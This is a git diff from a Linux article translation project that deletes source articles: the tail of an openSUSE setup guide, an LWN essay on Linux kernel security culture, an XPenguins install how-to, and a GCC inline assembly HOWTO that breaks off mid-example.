-![o42 nvidia](http://images.techhive.com/images/article/2015/11/o42-nvidia-100626950-large.idge.png)
-
-It will open a dialogue box showing all the packages it's going to install, click OK and follow the instructions. You can also run the following command after adding the Nvidia repository to install the needed Nvidia drivers:
-
- sudo zypper inr
-
-(Note: I have never used AMD/ATI cards so I have no experience with them.)
-
-### 6. Install media codecs ###
-
-Once you have VLC installed you won't need to install media codecs, but if you are using other apps for media playback you will need to install such codecs. Some developers have written scripts/tools which make this a much easier process. Just go to [this page][5] and install the entire pack by clicking on the appropriate button. It will open YaST and install the packages automatically (of course you will have to give the root password and trust the GnuPG key, as usual).
-
-### 7. Install your preferred email client ###
-
-OpenSUSE comes with Kmail or Evolution, depending on the Desktop Environment you installed on the system. I run Plasma, which comes with Kmail, and this email client leaves a lot to be desired. I suggest trying Thunderbird or Evolution mail. All major email clients are available through official repositories. You can also check my [handpicked list of the best email clients for Linux][6].
-
-### 8. Enable Samba services from Firewall ###
-
-OpenSUSE offers a much more secure system out of the box, compared to other distributions. But it also requires a little bit more work for a new user. If you are using Samba protocol to share files within your local network then you will have to allow that service from the Firewall.
-
-![o42 firewall](http://images.techhive.com/images/article/2015/11/o42-firewall-100626948-large970.idge.png)
-Allow Samba Client and Server from Firewall settings.
-
-Open YaST and search for Firewall. Once in Firewall settings, go to 'Allowed Services' where you will see a drop down list under 'Service to allow.' Select 'Samba Client,' then click 'Add.' Do the same with the 'Samba Server' option. Once both are added, click 'Next,' then click 'Finish,' and now you will be able to share folders from your openSUSE system and also access other machines over the local network.
-
-That's pretty much all that I did on my new openSUSE system to set it up just the way I like it. If you have any questions, please feel free to ask in the comments below.
-
---------------------------------------------------------------------------------
-
-via: http://www.itworld.com/article/3003865/open-source-tools/8-things-to-do-after-installing-opensuse-leap-421.html
-
-作者:[Swapnil Bhartiya][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.itworld.com/author/Swapnil-Bhartiya/
-[1]:https://www.flickr.com/photos/mtaphotos/11200079265/
-[2]:https://www.linux.com/news/software/applications/865760-opensuse-leap-421-review-the-most-mature-linux-distribution
-[3]:https://www.linux.com/learn/tutorials/857788-how-to-convert-videos-in-linux-using-the-command-line
-[4]:https://www.google.com/intl/en/chrome/browser/desktop/index.html#brand=CHMB&utm_campaign=en&utm_source=en-ha-na-us-sk&utm_medium=ha
-[5]:http://opensuse-community.org/
-[6]:http://www.itworld.com/article/2875981/the-5-best-open-source-email-clients-for-linux.html
diff --git a/sources/tech/20151202 A new Mindcraft moment.md b/sources/tech/20151202 A new Mindcraft moment.md
deleted file mode 100644
index 92c645ea4b..0000000000
--- a/sources/tech/20151202 A new Mindcraft moment.md
+++ /dev/null
@@ -1,44 +0,0 @@
-zpl1025
-A new Mindcraft moment?
-=======================
-
-Credit: Jonathan Corbet
-
-It is not often that Linux kernel development attracts the attention of a mainstream newspaper like The Washington Post; lengthy features on the kernel community's approach to security are even more uncommon. So when just such a feature hit the net, it attracted a lot of attention. This article has gotten mixed reactions, with many seeing it as a direct attack on Linux. The motivations behind the article are hard to know, but history suggests that we may look back on it as having given us a much-needed push in a direction we should have been going for some time.
-
-Think back, a moment, to the dim and distant past — April 1999, to be specific. An analyst company named Mindcraft issued a report showing that Windows NT greatly outperformed Red Hat Linux 5.2 and Apache for web-server workloads. The outcry from the Linux community, including from a very young LWN, was swift and strong. The report was a piece of Microsoft-funded FUD trying to cut off an emerging threat to its world-domination plans. The Linux system had been deliberately configured for poor performance. The hardware chosen was not well supported by Linux at the time. And so on.
-
-Once people calmed down a bit, though, one other fact came clear: the Mindcraft folks, whatever their motivations, had a point. Linux did, indeed, have performance problems that were reasonably well understood even at the time. The community then did what it does best: we sat down and fixed the problems. The scheduler got exclusive wakeups, for example, to put an end to the thundering-herd problem in the acceptance of connection requests. Numerous other little problems were fixed. Within a year or so, the kernel's performance on this kind of workload had improved considerably.
-
-The Mindcraft report, in other words, was a much-needed kick in the rear that got the community to deal with issues that had been neglected until then.
-
-The Washington Post article seems clearly slanted toward a negative view of the Linux kernel and its contributors. It freely mixes kernel problems with other issues (the AshleyMadison.com break-in, for example) that were not kernel vulnerabilities at all. The fact that vendors seem to have little interest in getting security fixes to their customers is danced around like a huge elephant in the room. There are rumors of dark forces that drove the article in the hopes of taking Linux down a notch. All of this could well be true, but it should not be allowed to overshadow the simple fact that the article has a valid point.
-
-We do a reasonable job of finding and fixing bugs. Problems, whether they are security-related or not, are patched quickly, and the stable-update mechanism makes those patches available to kernel users. Compared to a lot of programs out there (free and proprietary alike), the kernel is quite well supported. But pointing at our ability to fix bugs is missing a crucial point: fixing security bugs is, in the end, a game of whack-a-mole. There will always be more moles, some of which we will not know about (and will thus be unable to whack) for a long time after they are discovered and exploited by attackers. These bugs leave our users vulnerable, even if the commercial side of Linux did a perfect job of getting fixes to users — which it decidedly does not.
-
-The point that developers concerned about security have been trying to make for a while is that fixing bugs is not enough. We must instead realize that we will never fix them all and focus on making bugs harder to exploit. That means restricting access to information about the kernel, making it impossible for the kernel to execute code in user-space memory, instrumenting the kernel to detect integer overflows, and all the other things laid out in Kees Cook's Kernel Summit talk at the end of October. Many of these techniques are well understood and have been adopted by other operating systems; others will require innovation on our part. But, if we want to adequately defend our users from attackers, these changes need to be made.
-
-Why hasn't the kernel adopted these technologies already? The Washington Post article puts the blame firmly on the development community, and on Linus Torvalds in particular. The culture of the kernel community prioritizes performance and functionality over security and is unwilling to make compromises if they are needed to improve the security of the kernel. There is some truth to this claim; the good news is that attitudes appear to be shifting as the scope of the problem becomes clear. Kees's talk was well received, and it clearly got developers thinking and talking about the issues.
-
-The point that has been missed is that we do not just have a case of Linus fending off useful security patches. There simply are not many such patches circulating in the kernel community. In particular, the few developers who are working in this area have never made a serious attempt to get that work integrated upstream. Getting any large, intrusive patch set merged requires working with the kernel community, making the case for the changes, splitting the changes into reviewable pieces, dealing with review comments, and so on. It can be tiresome and frustrating, but it's how the kernel works, and it clearly results in a more generally useful, more maintainable kernel in the long run.
-
-Almost nobody is doing that work to get new security technologies into the kernel. One might cite a "chilling effect" from the hostile reaction such patches can receive, but that is an inadequate answer: developers have managed to merge many changes over the years despite a difficult initial reaction. Few security developers are even trying.
-
-Why aren't they trying? One fairly obvious answer is that almost nobody is being paid to try. Almost all of the work going into the kernel is done by paid developers and has been for many years. The areas that companies see fit to support get a lot of work and are well advanced in the kernel. The areas that companies think are not their problem are rather less so. The difficulties in getting support for realtime development are a clear case in point. Other areas, such as documentation, tend to languish as well. Security is clearly one of those areas. There are a lot of reasons why Linux lags behind in defensive security technologies, but one of the key ones is that the companies making money on Linux have not prioritized the development and integration of those technologies.
-
-There are signs that things might be changing a bit. More developers are showing interest in security-related issues, though commercial support for their work is still less than it should be. The reaction against security-related changes might be less knee-jerk negative than it used to be. Efforts like the Kernel Self Protection Project are starting to work on integrating existing security technologies into the kernel.
-
-We have a long way to go, but, with some support and the right mindset, a lot of progress can be made in a short time. The kernel community can do amazing things when it sets its mind to it. With luck, the Washington Post article will help to provide the needed impetus for that sort of setting of mind. History suggests that we will eventually see this moment as a turning point, when we were finally embarrassed into doing work that has clearly needed doing for a while. Linux should not have a substandard security story for much longer.
-
----------------------------
-
-via: https://lwn.net/Articles/663474/
-
-作者:Jonathan Corbet
-
-译者:[译者ID](https://github.com/译者ID)
-
-校对:[校对者ID](https://github.com/校对者ID)
-
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/sources/tech/20151215 Linux Desktop Fun--Summon Swarms Of Penguins To Waddle About The Desktop.md b/sources/tech/20151215 Linux Desktop Fun--Summon Swarms Of Penguins To Waddle About The Desktop.md
deleted file mode 100644
index b544517f5e..0000000000
--- a/sources/tech/20151215 Linux Desktop Fun--Summon Swarms Of Penguins To Waddle About The Desktop.md
+++ /dev/null
@@ -1,101 +0,0 @@
-translation by strugglingyouth
-Linux Desktop Fun: Summon Swarms Of Penguins To Waddle About The Desktop
-================================================================================
-XPenguins is a program for animating cute cartoon animals in your root window. By default they will be penguins: they drop in from the top of the screen, walk along the tops of your windows, climb up the sides of your windows, levitate, skateboard, and do other similarly exciting things. Now you can send an army of cute little penguins to invade the screen of someone else on your network.
-
-### Install XPenguins ###
-
-Open a command-line terminal (select Applications > Accessories > Terminal), and then type the following commands to install the XPenguins program. First, type the command apt-get update to tell apt to refresh its package information by querying the configured repositories, and then install the required program:
-
- $ sudo apt-get update
- $ sudo apt-get install xpenguins
-
-### How do I Start XPenguins Locally? ###
-
-Type the following command:
-
- $ xpenguins
-
-Sample outputs:
-
-![An army of cute little penguins invading the screen](http://files.cyberciti.biz/uploads/tips/2011/07/Workspace-1_002_12_07_2011.png)
-
-An army of cute little penguins invading the screen
-
-![Linux: Cute little penguins walking along the tops of your windows](http://files.cyberciti.biz/uploads/tips/2011/07/Workspace-1_001_12_07_2011.png)
-
-Linux: Cute little penguins walking along the tops of your windows
-
-![Xpenguins Screenshot](http://files.cyberciti.biz/uploads/tips/2011/07/xpenguins-screenshot.jpg)
-
-Xpenguins Screenshot
-
-Be careful when you move windows as the little guys squash easily. If you send the program an interrupt signal (Ctrl-C) they will burst.
-
-### Themes ###
-
-To list themes, enter:
-
- $ xpenguins -l
-
-Sample outputs:
-
- Big Penguins
- Bill
- Classic Penguins
- Penguins
- Turtles
-
-You can use alternative themes as follows:
-
- $ xpenguins --theme "Big Penguins" --theme "Turtles"
-
-You can install additional themes as follows:
-
- $ cd /tmp
- $ wget http://xpenguins.seul.org/xpenguins_themes-1.0.tar.gz
- $ tar -zxvf xpenguins_themes-1.0.tar.gz
- $ mkdir ~/.xpenguins
- $ mv -v themes ~/.xpenguins/
- $ xpenguins -l
-
-Sample outputs:
-
- Lemmings
- Sonic the Hedgehog
- The Simpsons
- Winnie the Pooh
- Worms
- Big Penguins
- Bill
- Classic Penguins
- Penguins
- Turtles
-
-To start with a random theme, enter:
-
- $ xpenguins --random-theme
-
-To load all available themes and run them simultaneously, enter:
-
- $ xpenguins --all
-
-More links and information:
-
-- [XPenguins][1] home page.
-- man penguins
-- More Linux / UNIX desktop fun with [Steam Locomotive][2] and [Terminal ASCII Aquarium][3].
-
---------------------------------------------------------------------------------
-
-via: http://www.cyberciti.biz/tips/linux-cute-little-xpenguins-walk-along-tops-ofyour-windows.html
-
-作者:Vivek Gite
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:http://xpenguins.seul.org/
-[2]:http://www.cyberciti.biz/tips/displays-animations-when-accidentally-you-type-sl-instead-of-ls.html
-[3]:http://www.cyberciti.biz/tips/linux-unix-apple-osx-terminal-ascii-aquarium.html
diff --git a/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md b/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md
index 7388b7693e..36c28d25d6 100644
--- a/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md
+++ b/sources/tech/20151215 Securi-Pi--Using the Raspberry Pi as a Secure Landing Point.md
@@ -1,7 +1,3 @@
-translating by ezio
-
-
-
Securi-Pi: Using the Raspberry Pi as a Secure Landing Point
================================================================================
diff --git a/sources/tech/20151220 GCC-Inline-Assembly-HOWTO.md b/sources/tech/20151220 GCC-Inline-Assembly-HOWTO.md
deleted file mode 100644
index 80031c7fd8..0000000000
--- a/sources/tech/20151220 GCC-Inline-Assembly-HOWTO.md
+++ /dev/null
@@ -1,631 +0,0 @@
-[Translating by cposture 16-01-14]
-* * *
-
-# GCC-Inline-Assembly-HOWTO
-v0.1, 01 March 2003.
-* * *
-
-_This HOWTO explains the use and usage of the inline assembly feature provided by GCC. There are only two prerequisites for reading this article, and that’s obviously a basic knowledge of x86 assembly language and C._
-
-* * *
-
-## 1. Introduction.
-
-## 1.1 Copyright and License.
-
-Copyright (C)2003 Sandeep S.
-
-This document is free; you can redistribute and/or modify this under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
-
-This document is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
-
-## 1.2 Feedback and Corrections.
-
-Kindly forward feedback and criticism to [Sandeep.S](mailto:busybox@sancharnet.in). I will be indebted to anybody who points out errors and inaccuracies in this document; I shall rectify them as soon as I am informed.
-
-## 1.3 Acknowledgments.
-
-I express my sincere appreciation to the GNU people for providing such a great feature. Thanks to Mr. Pramode C E for all the help he gave. Thanks to my friends at the Govt Engineering College, Trichur for their moral support and cooperation, especially to Nisha Kurur and Sakeeb S. Thanks to my dear teachers at Govt Engineering College, Trichur for their cooperation.
-
-Additionally, thanks to Phillip, Brennan Underwood and colin@nyx.net; Many things here are shamelessly stolen from their works.
-
-* * *
-
-## 2. Overview of the whole thing.
-
-We are here to learn about GCC inline assembly. What does this "inline" stand for?
-
-We can instruct the compiler to insert the code of a function into the code of its callers, at the point where the call would actually be made. Such functions are inline functions. Sounds similar to a macro? Indeed there are similarities.
-
-What is the benefit of inline functions?
-
-This method of inlining reduces the function-call overhead. And if any of the actual argument values are constant, their known values may permit simplifications at compile time so that not all of the inline function’s code needs to be included. The effect on code size is less predictable; it depends on the particular case. To declare an inline function, we have to use the keyword `inline` in its declaration.
-
-Now we are in a position to guess what inline assembly is. It’s just some assembly routines written as inline functions. They are handy, speedy and very useful in system programming. Our main focus is to study the basic format and usage of (GCC) inline assembly functions. To declare inline assembly functions, we use the keyword `asm`.
-
-Inline assembly is important primarily because of its ability to operate and make its output visible on C variables. Because of this capability, "asm" works as an interface between the assembly instructions and the "C" program that contains it.
-
-* * *
-
-## 3. GCC Assembler Syntax.
-
-GCC, the GNU C Compiler for Linux, uses **AT&T**/**UNIX** assembly syntax. Here we’ll be using AT&T syntax for assembly coding. Don’t worry if you are not familiar with AT&T syntax, I will teach you. This is quite different from Intel syntax. I shall give the major differences.
-
-1. Source-Destination Ordering.
-
- The direction of the operands in AT&T syntax is opposite to that of Intel. In Intel syntax the first operand is the destination, and the second operand is the source whereas in AT&T syntax the first operand is the source and the second operand is the destination. ie,
-
- "Op-code dst src" in Intel syntax changes to
-
- "Op-code src dst" in AT&T syntax.
-
-2. Register Naming.
-
- Register names are prefixed by % ie, if eax is to be used, write %eax.
-
-3. Immediate Operand.
-
- AT&T immediate operands are preceded by ’$’. For static "C" variables also prefix a ’$’. In Intel syntax, for hexadecimal constants an ’h’ is suffixed, instead of that, here we prefix ’0x’ to the constant. So, for hexadecimals, we first see a ’$’, then ’0x’ and finally the constants.
-
-4. Operand Size.
-
- In AT&T syntax the size of memory operands is determined from the last character of the op-code name. Op-code suffixes of ’b’, ’w’, and ’l’ specify byte(8-bit), word(16-bit), and long(32-bit) memory references. Intel syntax accomplishes this by prefixing memory operands (not the op-codes) with ’byte ptr’, ’word ptr’, and ’dword ptr’.
-
- Thus, Intel "mov al, byte ptr foo" is "movb foo, %al" in AT&T syntax.
-
-5. Memory Operands.
-
- In Intel syntax the base register is enclosed in ’[’ and ’]’ where as in AT&T they change to ’(’ and ’)’. Additionally, in Intel syntax an indirect memory reference is like
-
- section:[base + index*scale + disp], which changes to
-
- section:disp(base, index, scale) in AT&T.
-
- One point to bear in mind is that, when a constant is used for disp/scale, ’$’ shouldn’t be prefixed.
-
-Now we have seen some of the major differences between Intel syntax and AT&T syntax. I’ve written about only a few of them. For complete information, refer to the GNU Assembler documentation. Now we’ll look at some examples for better understanding.
-
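-A few representative instructions in both syntaxes (a sketch of the usual comparison table; see the GNU Assembler manual for the full story):
-
-    +------------------------------+------------------------------------+
-    |       Intel Code             |      AT&T Code                     |
-    +------------------------------+------------------------------------+
-    | mov     eax,1                |  movl    $1,%eax                   |
-    | mov     ebx,0ffh             |  movl    $0xff,%ebx                |
-    | int     80h                  |  int     $0x80                     |
-    | mov     ebx, eax             |  movl    %eax, %ebx                |
-    | mov     eax,[ecx]            |  movl    (%ecx),%eax               |
-    | mov     eax,[ebx+3]          |  movl    3(%ebx),%eax              |
-    | lea     eax,[ebx+ecx]        |  leal    (%ebx,%ecx),%eax          |
-    | add     eax,[ebx+ecx*2h]     |  addl    (%ebx,%ecx,0x2),%eax      |
-    +------------------------------+------------------------------------+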
-
-* * *
-
-## 4. Basic Inline.
-
-The format of basic inline assembly is straightforward. Its basic form is
-
-`asm("assembly code");`
-
-Example.
-
-    asm("movl %ecx, %eax");       /* moves the contents of ecx to eax */
-    __asm__("movb %bh, (%eax)");  /* moves the byte from bh to the memory pointed to by eax */
-
-You might have noticed that here I’ve used `asm` and `__asm__`. Both are valid. We can use `__asm__` if the keyword `asm` conflicts with something in our program. If we have more than one instruction, we write one per line in double quotes, and also suffix a ’\n’ and ’\t’ to each instruction. This is because gcc sends each instruction as a string to **as** (GAS) and by using the newline/tab we send correctly formatted lines to the assembler.
-
-Example.
-
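-A sketch of such a sequence (the particular instructions are arbitrary):
-
-    __asm__ ("movl %eax, %ebx\n\t"
-             "movl $56, %esi\n\t"
-             "movb %ah, (%ebx)");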
-
-If in our code we touch (ie, change the contents of) some registers and return from asm without fixing those changes, something bad is going to happen. This is because GCC has no idea about the changes in the register contents, and this leads us to trouble, especially when the compiler makes some optimizations. It will suppose that some register contains the value of some variable that we might have changed without informing GCC, and it continues like nothing happened. What we can do is either use those instructions having no side effects, or fix things when we quit, or wait for something to crash. This is where we want some extended functionality. Extended asm provides us with that functionality.
-
-* * *
-
-## 5. Extended Asm.
-
-In basic inline assembly, we had only instructions. In extended assembly, we can also specify the operands. It allows us to specify the input registers, output registers and a list of clobbered registers. It is not mandatory to specify the registers to use; we can leave that headache to GCC, and that probably fits into GCC’s optimization scheme better. Anyway the basic format is:
-
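-    asm ( assembler template
-        : output operands                  /* optional */
-        : input operands                   /* optional */
-        : list of clobbered registers      /* optional */
-        );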
-
-The assembler template consists of assembly instructions. Each operand is described by an operand-constraint string followed by the C expression in parentheses. A colon separates the assembler template from the first output operand and another separates the last output operand from the first input, if any. Commas separate the operands within each group. The total number of operands is limited to ten or to the maximum number of operands in any instruction pattern in the machine description, whichever is greater.
-
-If there are no output operands but there are input operands, you must place two consecutive colons surrounding the place where the output operands would go.
-
-Example:
-
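-A sketch of such a snippet (assuming `fill_value`, `count` and `dest` are C variables in scope; two dummy outputs mark `ecx` and `edi` as modified, because a register may not appear both as an input operand and in the clobber list):
-
-    int d0, d1;
-    asm ("cld\n\t"
-         "rep\n\t"
-         "stosl"
-         : "=&c" (d0), "=&D" (d1)
-         : "0" (count), "a" (fill_value), "1" (dest)
-         : "memory");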
-
-Now, what does this code do? The above inline fills `fill_value` into the location pointed to by the register `edi`, `count` times. Through the dummy outputs it also says to gcc that the contents of registers `ecx` and `edi` are no longer valid. Let us see one more example to make things clearer.
-
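-A sketch (with `a` and `b` as `int` variables):
-
-    int a = 10, b;
-    asm ("movl %1, %%eax;\n\t"
-         "movl %%eax, %0;"
-         : "=r" (b)     /* output */
-         : "r" (a)      /* input */
-         : "%eax");     /* clobbered register */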
-
-Here we made the value of ’b’ equal to that of ’a’ using assembly instructions. Some points of interest are:
-
-* "b" is the output operand, referred to by %0 and "a" is the input operand, referred to by %1.
-* "r" is a constraint on the operands. We’ll see constraints in detail later. For the time being, "r" tells GCC to use any register for storing the operands. The output operand constraint should have a constraint modifier "=", and this modifier says that it is the output operand and is write-only.
-* There are two %’s prefixed to the register name. This helps GCC to distinguish between the operands and registers. Operands have a single % as prefix.
-* The clobbered register %eax after the third colon tells GCC that the value of %eax is to be modified inside "asm", so GCC won’t use this register to store any other value.
-
-When the execution of "asm" is complete, "b" will reflect the updated value, as it is specified as an output operand. In other words, the change made to "b" inside "asm" is supposed to be reflected outside the "asm".
-
-Now we may look each field in detail.
-
-## 5.1 Assembler Template.
-
-The assembler template contains the set of assembly instructions that gets inserted inside the C program. The format is: either each instruction should be enclosed within double quotes, or the entire group of instructions should be within double quotes. Each instruction should also end with a delimiter. The valid delimiters are newline (\n) and semicolon (;). ’\n’ may be followed by a tab (\t). We know the reason for the newline/tab, right? Operands corresponding to the C expressions are represented by %0, %1 ... etc.
-
-## 5.2 Operands.
-
-C expressions serve as operands for the assembly instructions inside "asm". Each operand is written as first an operand constraint in double quotes. For output operands, there’ll be a constraint modifier also within the quotes and then follows the C expression which stands for the operand. ie,
-
-"constraint" (C expression) is the general form. For output operands an additional modifier will be there. Constraints are primarily used to decide the addressing modes for operands. They are also used in specifying the registers to be used.
-
-If we use more than one operand, they are separated by comma.
-
-In the assembler template, each operand is referenced by numbers. Numbering is done as follows. If there are a total of n operands (both input and output inclusive), then the first output operand is numbered 0, continuing in increasing order, and the last input operand is numbered n-1. The maximum number of operands is as we saw in the previous section.
-
-Output operand expressions must be lvalues. The input operands are not restricted like this; they may be expressions. The extended asm feature is most often used for machine instructions the compiler itself does not know exist ;-). If the output expression cannot be directly addressed (for example, it is a bit-field), our constraint must allow a register. In that case, GCC will use the register as the output of the asm, and then store that register’s contents into the output.
-
-As stated above, ordinary output operands must be write-only; GCC will assume that the values in these operands before the instruction are dead and need not be generated. Extended asm also supports input-output or read-write operands.
-
-So now we concentrate on some examples. We want to multiply a number by 5. For that we use the instruction `lea`.
-
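-One way to write it (with `x` and `five_times_x` as `int` variables; the names are illustrative):
-
-    asm ("leal (%1,%1,4), %0"
-         : "=r" (five_times_x)
-         : "r" (x));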
-
-Here our input is in ’x’. We didn’t specify the register to be used. GCC will choose some register for input, one for output, and do what we desired. If we want the input and output to reside in the same register, we can instruct GCC to do so. Here we use those types of read-write operands, by specifying the proper constraints.
-
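-With a matching constraint, so that input and output use the same register:
-
-    asm ("leal (%0,%0,4), %0"
-         : "=r" (five_times_x)
-         : "0" (x));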
-
-Now the input and output operands are in the same register. But we don’t know which register. Now if we want to specify that also, there is a way.
-
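-And pinning the work to a specific register, `ecx`:
-
-    asm ("leal (%%ecx,%%ecx,4), %%ecx"
-         : "=c" (x)
-         : "c" (x));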
-
-In all the three examples above, we didn’t put any register in the clobber list. Why? In the first two examples, GCC decides the registers and it knows what changes happen. In the last one, we don’t have to put `ecx` in the clobber list; gcc knows it goes into x. Therefore, since it can know the value of `ecx`, it isn’t considered clobbered.
-
-## 5.3 Clobber List.
-
-Some instructions clobber some hardware registers. We have to list those registers in the clobber-list, ie the field after the third ’**:**’ in the asm function. This is to inform gcc that we will use and modify them ourselves, so gcc will not assume that the values it loads into these registers will be valid. We shouldn’t list the input and output registers in this list, because gcc knows that "asm" uses them (since they are specified explicitly as constraints). If the instructions use any other registers, implicitly or explicitly (and the registers are not present either in the input or in the output constraint list), then those registers have to be specified in the clobber list.
-
-If our instruction can alter the condition code register, we have to add "cc" to the list of clobbered registers.
-
-If our instruction modifies memory in an unpredictable fashion, add "memory" to the list of clobbered registers. This will cause GCC to not keep memory values cached in registers across the assembler instruction. We also have to add the **volatile** keyword if the memory affected is not listed in the inputs or outputs of the asm.
-
-We can read and write the clobbered registers as many times as we like. Consider the example of multiple instructions in a template; it assumes the subroutine _foo accepts arguments in registers `eax` and `ecx`.
-
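-A sketch (with `from` and `to` as C variables, and `_foo` the hypothetical subroutine):
-
-    asm ("movl %0,%%eax;\n\t"
-         "movl %1,%%ecx;\n\t"
-         "call _foo"
-         : /* no outputs */
-         : "g" (from), "g" (to)
-         : "eax", "ecx");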
-
-## 5.4 Volatile ...?
-
-If you are familiar with kernel sources or some beautiful code like that, you must have seen many functions declared as `volatile` or `__volatile__` which follows an `asm` or `__asm__`. I mentioned earlier about the keywords `asm` and `__asm__`. So what is this `volatile`?
-
-If our assembly statement must execute where we put it, (i.e. must not be moved out of a loop as an optimization), put the keyword `volatile` after asm and before the ()’s. So to keep it from moving, deleting and all, we declare it as
-
-`asm volatile ( ... : ... : ... : ...);`
-
-Use `__volatile__` when we have to be especially careful.
-
-If our assembly is just for doing some calculations and doesn’t have any side effects, it’s better not to use the keyword `volatile`. Avoiding it helps gcc in optimizing the code and making it more beautiful.
-
-In the section `Some Useful Recipes`, I have provided many examples for inline asm functions. There we can see the clobber-list in detail.
-
-* * *
-
-## 6. More about constraints.
-
-By this time, you might have understood that constraints have got a lot to do with inline assembly. But we’ve said little about constraints. Constraints can say whether an operand may be in a register, and which kinds of register; whether the operand can be a memory reference, and which kinds of address; whether the operand may be an immediate constant, and which possible values (ie range of values) it may have.... etc.
-
-## 6.1 Commonly used constraints.
-
-There are a number of constraints of which only a few are used frequently. We’ll have a look at those constraints.
-
-1. **Register operand constraint(r)**
-
- When operands are specified using this constraint, they get stored in General Purpose Registers(GPR). Take the following example:
-
- `asm ("movl %%eax, %0\n" :"=r"(myval));`
-
- Here the variable myval is kept in a register, the value in register `eax` is copied onto that register, and the value of `myval` is updated into the memory from this register. When the "r" constraint is specified, gcc may keep the variable in any of the available GPRs. To specify the register, you must directly specify the register names by using specific register constraints. They are:
-
- > `
- >
- >
- > +---+--------------------+
- > | r | Register(s) |
- > +---+--------------------+
- > | a | %eax, %ax, %al |
- > | b | %ebx, %bx, %bl |
- > | c | %ecx, %cx, %cl |
- > | d | %edx, %dx, %dl |
- > | S | %esi, %si |
- > | D | %edi, %di |
- > +---+--------------------+
- >
- >
- > `
-
-2. **Memory operand constraint(m)**
-
- When the operands are in the memory, any operations performed on them will occur directly in the memory location, as opposed to register constraints, which first store the value in a register to be modified and then write it back to the memory location. But register constraints are usually used only when they are absolutely necessary for an instruction or they significantly speed up the process. Memory constraints can be used most efficiently in cases where a C variable needs to be updated inside "asm" and you really don’t want to use a register to hold its value. For example, the value of idtr is stored in the memory location loc:
-
- `asm("sidt %0\n" : :"m"(loc));`
-
-3. **Matching(Digit) constraints**
-
- In some cases, a single variable may serve as both the input and the output operand. Such cases may be specified in "asm" by using matching constraints.
-
- `asm ("incl %0" :"=a"(var):"0"(var));`
-
-    We saw similar examples in the operands subsection also. In this example for matching constraints, the register %eax is used both as the input and the output variable. The input var is read into %eax, and after the increment the updated %eax is stored in var again. "0" here specifies the same constraint as the 0th output variable. That is, it specifies that the output instance of var should be stored in %eax only. This constraint can be used:
-
- * In cases where input is read from a variable or the variable is modified and modification is written back to the same variable.
- * In cases where separate instances of input and output operands are not necessary.
-
-    The most important effect of using matching constraints is that they lead to the efficient use of available registers.
-
-Some other constraints used are:
-
-1. "m" : A memory operand is allowed, with any kind of address that the machine supports in general.
-2. "o" : A memory operand is allowed, but only if the address is offsettable. ie, adding a small offset to the address gives a valid address.
-3. "V" : A memory operand that is not offsettable. In other words, anything that would fit the `m’ constraint but not the `o’ constraint.
-4. "i" : An immediate integer operand (one with constant value) is allowed. This includes symbolic constants whose values will be known only at assembly time.
-5. "n" : An immediate integer operand with a known numeric value is allowed. Many systems cannot support assembly-time constants for operands less than a word wide. Constraints for these operands should use ’n’ rather than ’i’.
-6. "g" : Any register, memory or immediate integer operand is allowed, except for registers that are not general registers.
-
-The following constraints are x86-specific.
-
-1. "r" : Register operand constraint, look table given above.
-2. "q" : Registers a, b, c or d.
-3. "I" : Constant in range 0 to 31 (for 32-bit shifts).
-4. "J" : Constant in range 0 to 63 (for 64-bit shifts).
-5. "K" : 0xff.
-6. "L" : 0xffff.
-7. "M" : 0, 1, 2, or 3 (shifts for lea instruction).
-8. "N" : Constant in range 0 to 255 (for out instruction).
-9. "f" : Floating point register
-10. "t" : First (top of stack) floating point register
-11. "u" : Second floating point register
-12. "A" : Specifies the `a’ or `d’ registers. This is primarily useful for 64-bit integer values intended to be returned with the `d’ register holding the most significant bits and the `a’ register holding the least significant bits.
-
-## 6.2 Constraint Modifiers.
-
-For more precise control over the effects of constraints, GCC provides us with constraint modifiers. The most commonly used constraint modifiers are
-
-1. "=" : Means that this operand is write-only for this instruction; the previous value is discarded and replaced by output data.
-2. "&" : Means that this operand is an earlyclobber operand, which is modified before the instruction is finished using the input operands. Therefore, this operand may not lie in a register that is used as an input operand or as part of any memory address. An input operand can be tied to an earlyclobber operand if its only use as an input occurs before the early result is written.
-
- The list and explanation of constraints is by no means complete. Examples can give a better understanding of the use and usage of inline asm. In the next section we’ll see some examples, there we’ll find more about clobber-lists and constraints.
-
-* * *
-
-## 7. Some Useful Recipes.
-
-Now that we have covered the basic theory of GCC inline assembly, we shall concentrate on some simple examples. It is always handy to write inline asm functions as macros. We can see many asm functions in the kernel code (/usr/src/linux/include/asm/*.h).
-
-1. First we start with a simple example. We’ll write a program to add two numbers.
-
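-    A sketch of the program (printf assumes stdio.h is included):
-
-        int foo = 10, bar = 15;
-
-        __asm__ __volatile__ ("addl %%ebx,%%eax"
-                              : "=a" (foo)
-                              : "a" (foo), "b" (bar));
-        printf("foo+bar=%d\n", foo);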
-
-    Here we tell GCC to store foo in %eax and bar in %ebx, and we also want the result in %eax. The ’=’ sign shows that it is an output register. Now we can add an integer to a variable in some other way.
-
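-    A sketch (my_var and my_int assumed to be int variables):
-
-        __asm__ __volatile__ ("lock;\n\t"
-                              "addl %1,%0"
-                              : "=m" (my_var)
-                              : "ir" (my_int), "m" (my_var));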
-
-    This is an atomic addition. We can remove the instruction ’lock’ to remove the atomicity. In the output field, "=m" says that my_var is an output and it is in memory. Similarly, "ir" says that my_int is an integer and should reside in some register (recall the table we saw above). No registers are in the clobber list.
-
-2. Now we’ll perform some action on some registers/variables and compare the value.
-
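-    A sketch (my_var is an int in memory, cond an int that receives the flag):
-
-        __asm__ __volatile__ ("decl %0; sete %1"
-                              : "=m" (my_var), "=q" (cond)
-                              : "m" (my_var)
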